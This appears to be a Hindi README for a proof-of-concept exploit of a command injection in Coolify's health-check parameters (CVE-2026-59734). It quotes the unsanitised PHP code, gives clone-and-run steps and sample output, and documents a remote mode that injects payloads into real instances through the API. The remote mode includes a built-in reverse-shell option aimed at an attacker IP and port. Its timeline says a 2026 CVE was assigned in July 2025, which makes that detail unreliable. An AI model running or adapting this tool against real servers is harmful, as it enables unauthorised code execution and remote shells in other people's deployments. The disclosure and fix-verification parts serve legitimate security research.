
स्वास्थ्य जांच में OS कमांड इंजेक्शन → दूरस्थ कोड निष्पादन
कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में OS कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
कोई भी प्रमाणित उपयोगकर्ता तैनात कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।
Coolify एक लोकप्रिय ओपन-सोर्स, स्व-होस्टेड डिप्लॉयमेंट प्लेटफॉर्म है (30K+ GitHub स्टार) — जो Heroku, Vercel और Netlify का मुफ्त विकल्प है।
कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में एक गंभीर OS कमांड इंजेक्शन भेद्यता पाई गई। health_check_host, health_check_method, और health_check_path पैरामीटर बिना किसी सैनिटाइज़ेशन के सीधे शेल कमांड में डाले जाते हैं, जिससे कोई भी प्रमाणित उपयोगकर्ता डिप्लॉयमेंट कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID │ CVE-2026-59734 │
│ Type │ OS Command Injection (CWE-78) │
│ Severity │ HIGH — CVSS 8.8 │
│ Attack Vector │ Network (Authenticated) │
│ Affected │ Coolify <= v4.0.0-beta.460 │
│ Fixed In │ Coolify >= v4.0.0-beta.469 │
│ Fix Commit │ 23f9156c7 │
│ Reporter │ CyberTechAjju │
└──────────────────┴──────────────────────────────────────┘
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()
// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
"curl -s -X {$this->application->health_check_method} -f " .
"{$this->application->health_check_scheme}://" .
"{$this->application->health_check_host}:" .
"{$health_check_port}" .
"{$this->application->health_check_path} > /dev/null || exit 1",
];
यह PoC स्क्रिप्ट CVE-2026-59734 को दो मोड में मान्य करती है और इसका शोषण करती है:
| Mode | विवरण | जोखिम |
|---|---|---|
--local | भेद्य कोड पैटर्न को ऑफ़लाइन अनुकरण करता है। कोई नेटवर्क अनुरोध नहीं। सभी 3 इंजेक्ट करने योग्य पैरामीटर का परीक्षण + फिक्स की पुष्टि करता है। | ✅ सुरक्षित |
--remote | API के माध्यम से एक वास्तविक कूलिफ़ाई इंस्टेंस का शोषण करता है। स्वास्थ्य जांच कॉन्फ़िगरेशन में पेलोड इंजेक्ट करता है और डिप्लॉयमेंट ट्रिगर करता है। | ⚠️ प्रमाणीकरण आवश्यक |
host, method, path के माध्यम से इंजेक्शन को मान्य करता है + पुष्टि करता है कि escapeshellarg() फिक्स काम करता है--lhost / --lport के साथ अंतर्निहित रिवर्स शेल पेलोडgit clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh
# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
अपेक्षित आउटपुट:
═══ LOCAL VULNERABILITY PATTERN VALIDATION ═══
┌─ Test 1: health_check_host injection
│ ✅ VULNERABLE — Injected command executed successfully
┌─ Test 2: health_check_method injection
│ ✅ VULNERABLE — Method parameter also injectable
┌─ Test 3: health_check_path injection
│ ✅ VULNERABLE — Path parameter also injectable
┌─ Test 4: Verify that escapeshellarg() fixes the issue
│ ✅ SAFE — Sanitized input prevents injection
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID
# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--lhost YOUR_IP \
--lport 4444
# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--cleanup
उपयोग:
स्थानीय मान्यता (सुरक्षित, ऑफ़लाइन):
./coolify_healthcheck_rce_poc.sh --local
रिमोट शोषण (प्रमाणीकरण आवश्यक):
./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONS]
विकल्प:
--url कूलिफ़ाई इंस्टेंस URL (उदा. https://coolify.example.com)
--token API बियरर टोकन
--uuid लक्ष्य एप्लिकेशन UUID
--payload कस्टम इंजेक्शन पेलोड
--lhost रिवर्स शेल के लिए हमलावर IP
--lport रिवर्स शेल के लिए हमलावर पोर्ट (डिफ़ॉल्ट: 4444)
--cleanup शोषण के बाद मूल कॉन्फ़िगरेशन पुनर्स्थापित करें
API टोकन:
ऐप UUID:
curl -s https://YOUR-COOLIFY/api/v1/applications \
-H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
मैंने एक विस्तृत ब्लॉग पोस्ट लिखा है जो पूरी खोज, शोषण और सीखे गए सबक बताता है:
🔗 How I Found an OS Command Injection (RCE) in Coolify — Medium
YouTube पर पूरा शोषण डेमो देखें:
🔗 CVE-2026-59734 — Coolify RCE Demo — YouTube
| दिनांक | घटना |
|---|---|
| Jan 6, 2025 | 🔍 खोजा गया और GitHub सुरक्षा सलाहकार के माध्यम से रिपोर्ट किया गया |
| Jan 16, 2025 | ✅ कूलिफ़ाई अनुरक्षक द्वारा रिपोर्ट स्वीकार की गई |
| Feb 24, 2025 | 🔬 जांच की पुष्टि हुई |
| Mar 18, 2025 | 🔧 फिक्स प्रतिबद्ध (23f9156c7) |
| Apr 12, 2025 | 📦 v4.0.0-beta.469 में फिक्स जारी किया गया |
| Jul 2025 | 🏷️ CVE-2026-59734 निर्धारित और सलाहकार प्रकाशित |